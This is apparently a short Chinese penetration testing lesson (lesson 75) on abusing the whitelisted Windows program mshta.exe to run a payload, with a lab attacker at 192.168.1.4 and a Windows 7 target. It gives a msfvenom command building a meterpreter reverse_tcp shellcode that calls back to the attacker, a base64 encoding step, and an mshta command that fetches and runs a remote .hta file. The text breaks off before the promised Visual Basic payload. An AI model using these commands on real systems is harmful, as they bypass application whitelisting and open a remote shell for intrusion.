Mshta.exe是微软Windows操作系统相关程序，英文全称Microsoft HTML Application，可翻译为微软超文本标记语言应用，用于执行.HTA文件。

说明：Mshta所在路径已被系统添加PATH环境变量中，因此，可直接执行Mshta.exe命令。

基于白名单Mshta.exe配置payload：

Windows 7 默认位置：

C:\Windows\System32\mshta.exe
C:\Windows\SysWOW64\mshta.exe

攻击机：192.168.1.4 Debian
靶机： 192.168.1.3 Windows 7

msfvenom ‐a x86 ‐‐platform windows ‐p windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=53 ‐f raw > shellcode.bin

cat shellcode.bin |base64 ‐w 0

替换如下：

mshta.exe http://192.168.1.4/Micropoor.hta

注：x86 payload ```visual basic

第七十五课：基于白名单Mshta.exe执行payload第五季

results matching ""